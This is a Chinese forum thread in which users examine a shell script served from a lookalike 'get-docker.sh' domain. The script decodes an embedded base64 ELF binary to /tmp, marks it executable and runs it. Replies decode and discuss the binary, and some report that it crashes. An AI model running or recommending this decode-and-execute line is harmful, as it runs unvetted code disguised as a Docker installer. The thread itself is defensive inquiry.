网址是 http://get-docker.sh,打开后跳转到 http://blin.gg/get-docker.sh,返回以下代码:
#!/bin/bash
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out
有谁知道这是要做什么?
 |
1
bbsingao Sep 11, 2024
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H�� H�� H��7�� 竟然是个二进制, |
 |
2
swulling Sep 11, 2024
为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
|
 |
3
Tink PRO 是个二进制
ELF���DZH��0�>���<�8H�� H�� H��7��% |
 |
4
hingle Sep 11, 2024
这么短的二进制,执行了什么操作,有没有懂的?
|
 |
5
woyao Sep 11, 2024
从域名存活历史来看,有好几年了。
域名根目录下还有一个文件 dominion.elf 但是看了一下吧,应该是 Flare-On 2020: break get-docker.sh 似乎不完整…… 直接访问根域名吧,提示 !!! This is a research server !!! |
 |
6
body007 Sep 11, 2024
 这个有问题的恶意代码,尽然有很多国内文章里面用到了🤣🤣🤣 |
 |
8
a33291 Sep 11, 2024
 mei'kan'dao 没看到什么有价值的操作 |
 |
9
zwzwzwzwzxt Sep 11, 2024
为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊
 |
 |
10
nagisaushio Sep 11, 2024
跑起来直接 segfault 了
|
Select Language